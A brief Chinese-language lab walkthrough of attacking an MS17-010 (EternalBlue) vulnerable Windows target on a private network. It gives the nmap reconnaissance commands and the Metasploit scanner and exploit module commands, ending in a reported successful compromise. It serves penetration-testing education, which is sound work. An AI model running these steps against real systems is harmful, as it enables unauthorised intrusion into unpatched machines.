Ms17-010漏洞攻击过程
先输入指令 sudo su 获得 root 权限
1.情报收集
输入 ifconfig 查看主机 IP 地址
通过主机IP输入nmap 192.168.181.1-254 来扫描同一网段下的其他IP地址
目标主机IP地址为192.168.181.130
然后输入nmap –v –T4 –A 192.168.181.130
发现靶机端口445为开启状态
输入ping 192.168.181.130
发现可以ping通
2.威胁建模
启用msf,输入指令msfconsole
3.漏洞分析
输入指令search ms17-010搜索漏洞
输入指令use 3
使用序号为3的辅助模块 auxiliary/scanner/smb/smb_ms17_010
输入指令show options查看漏洞模块
漏洞模块信息中所有required显示yes的都是需要配置信息的
为RHOSTS配置信息
输入指令set RHOSTS 192.168.181.130
配置好后,输入指令show options再次检查配置情况
4.检测是否存在该漏洞
输入指令run
开始运行
发现存在漏洞,使用之前序号为0的攻击模块
输入use exploit/windows/smb/ms17_010_eternalblue
显示payload已就绪
输入指令show options查看配置信息
输入指令set RHOSTS 192.168.181.130来配置攻击目标IP
最后输入指令run
ms17-010攻击成功